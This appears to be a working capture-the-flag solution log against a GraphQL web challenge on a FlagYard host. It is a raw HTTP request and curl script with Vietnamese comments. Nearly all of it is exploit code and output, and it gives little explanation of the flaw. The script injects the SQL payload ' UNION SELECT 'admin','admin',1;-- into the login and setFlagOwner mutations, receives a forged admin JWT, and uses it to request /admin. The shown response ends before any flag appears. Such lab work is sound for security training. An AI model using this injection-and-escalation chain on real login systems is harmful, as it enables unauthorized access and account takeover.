POST /graphql HTTP/1.1
Host: vk5ftvnfqw-0.playat.flagyard.com
Content-Length: 243
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://vk5ftvnfqw-0.playat.flagyard.com
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{
  "query": "mutation Login($username: String!, $password: String!) { login(username: $username, password: $password) { token } }",
  "variables": {
    "username": "' UNION SELECT 'admin','admin',1;--",
    "password": "admin"
  }
}
 

➜  ~ >....                                                                      
#    - Lưu ý: chuỗi username ở đây là:  ' UNION SELECT 'admin','admin',1;--
NEW_TOKEN=$(curl -s -X POST 'http://vk5ftvnfqw-0.playat.flagyard.com/graphql' \
  -H 'Content-Type: application/json' \
  -H "Authorization: Bearer $OLD_TOKEN" \
  -d @- <<'JSON' | jq -r '.data.setFlagOwner'
{
  "query": "mutation SetFlagOwner($username: String!) { setFlagOwner(username: $username) }",
  "variables": {
    "username": "' UNION SELECT 'admin','admin',1;--"
  }
}
JSON
)

# 3) Hiển thị token mới (kiểm tra)
echo "NEW_TOKEN: $NEW_TOKEN"

# 4) Dùng token mới để truy cập /admin và in flag
curl -s -X GET 'http://vk5ftvnfqw-0.playat.flagyard.com/admin' \
  -H "Authorization: Bearer $NEW_TOKEN" \
  -i

NEW_TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IicgVU5JT04gU0VMRUNUICdhZG1pbicsJ2FkbWluJywxOy0tIiwiZmxhZ093bmVyIjp0cnVlLCJpYXQiOjE3NjA1Mjk0NzcsImV4cCI6MTc2MDUyOTgzN30.4xhu0aoqBt438heU4WJhXgyqCeq9tw86JiKkR506AK8
HTTP/1.1 200 OK
Date: Wed, 15 Oct 2025 11:57:58 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 39
Connection: keep-alive
ETag: W/"27-N4i+Gh605V6TZmA9lzjeNiMcXvU"
Referrer-Policy: no-referrer

